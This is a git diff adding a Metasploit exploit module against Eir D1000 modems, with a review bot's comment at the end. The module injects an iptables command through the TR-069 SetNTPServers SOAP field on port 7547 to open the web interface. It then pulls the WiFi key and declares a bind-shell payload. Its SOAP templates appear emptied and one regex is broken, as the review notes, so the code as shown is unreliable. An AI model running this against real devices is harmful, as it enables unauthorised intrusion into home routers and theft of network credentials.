diff --git a/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb b/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb
new file mode 100644
index 0000000000..6d2a32db2c
--- /dev/null
+++ b/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb
@@ -0,0 +1,146 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Eir D1000 Modem CWMP Exploit POC',
+ 'Description' => %q{
+ This exploit drops the firewall to allow access to the web administration interface on port 80 and
+ it also retrieves the wifi password. The default login password to the web interface is the default wifi
+ password. This exploit was tested on firmware versions up to 2.00(AADU.5)_20150909.
+ },
+ 'Author' =>
+ [
+ 'Kenzo', # Vulnerability discovery and Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'DisclosureDate' => 'Nov 07 2016',
+ 'Privileged' => true,
+ 'DefaultOptions' =>
+ {
+ 'PAYLOAD' => 'linux/mipsbe/shell_bind_tcp'
+ },
+ 'Targets' =>
+ [
+ [ 'MIPS Little Endian',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_MIPSLE
+ }
+ ],
+ [ 'MIPS Big Endian',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_MIPSBE
+ }
+ ],
+ ],
+ 'DefaultTarget' => 1
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(7547), # CWMP port
+ ], self.class)
+
+ @data_cmd_template = ""
+ @data_cmd_template << ""
+ @data_cmd_template << " "
+ @data_cmd_template << " "
+ @data_cmd_template << " %s"
+ @data_cmd_template << " "
+ @data_cmd_template << " "
+ @data_cmd_template << " "
+ @data_cmd_template << " "
+ @data_cmd_template << " "
+ @data_cmd_template << " "
+ @data_cmd_template << ""
+ end
+
+ def check
+ begin
+ res = send_request_cgi({
+ 'uri' => '/globe'
+ })
+ rescue ::Rex::ConnectionError
+ vprint_error("A connection error has occured")
+ return Exploit::CheckCode::Unknown
+ end
+
+ if res and res.code == 404 and res.body =~ /home_wan.htm/
+ return Exploit::CheckCode::Appears
+ end
+
+ return Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ print_status("Trying to access the device...")
+
+ unless check == Exploit::CheckCode::Appears
+ fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
+ end
+
+ print_status("Exploiting...")
+ print_status("Dropping firewall on port 80...")
+ execute_command("`iptables -I INPUT -p tcp --dport 80 -j ACCEPT`","")
+ key = get_wifi_key()
+ print_status("WiFi key is #{key}")
+ execute_command("tick.eircom.net","")
+ end
+
+ def execute_command(cmd, opts)
+ uri = '/UD/act?1'
+ soapaction = "urn:dslforum-org:service:Time:1#SetNTPServers"
+ data_cmd = @data_cmd_template % "#{cmd}"
+ begin
+ res = send_request_cgi({
+ 'uri' => uri,
+ 'ctype' => "text/xml",
+ 'method' => 'POST',
+ 'headers' => {
+ 'SOAPAction' => soapaction,
+ },
+ 'data' => data_cmd
+ })
+ return res
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+ end
+ end
+
+ def get_wifi_key()
+ print_status("Getting the wifi key...")
+ uri = '/UD/act?1'
+ soapaction = "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys"
+ data_cmd_template = ""
+ data_cmd_template << ""
+ data_cmd_template << " "
+ data_cmd_template << " "
+ data_cmd_template << " "
+ data_cmd_template << " "
+ data_cmd_template << ""
+ data_cmd= data_cmd_template
+
+ begin
+ res = send_request_cgi({
+ 'uri' => uri,
+ 'ctype' => "text/xml",
+ 'method' => 'POST',
+ 'headers' => {
+ 'SOAPAction' => soapaction,
+ },
+ 'data' => data_cmd
+ })
+
+ /NewPreSharedKey>(?.*)<\/NewPreSharedKey/ =~ res.body
+ return key
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+ end
+ end
+end
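Review bot: In `get_wifi_key`, `res.body` is dereferenced without checking that `send_request_cgi` returned a response, so a timeout (nil result) raises NoMethodError instead of failing cleanly, whereas `check` guards with `res and`; add `fail_with(Failure::Unknown, "#{peer} - No response to GetSecurityKeys") unless res` before the match. The group `(?.*)` on that line is not valid as shown and never binds `key`; it looks like a named capture whose name was lost, and the SOAP template strings appear emptied in the same way, so confirm the committed file matches what was tested. Because `fail_with` raises, a failure here also skips the final `execute_command("tick.eircom.net","")` in `exploit`, which appears to reset the NTP server value, so the device is left modified; moving that call into an `ensure` would make the restore step reliable. The metadata has no `'References'` entry, and it declares a payload and two targets although `exploit` never delivers a payload, so this may fit better as an auxiliary module.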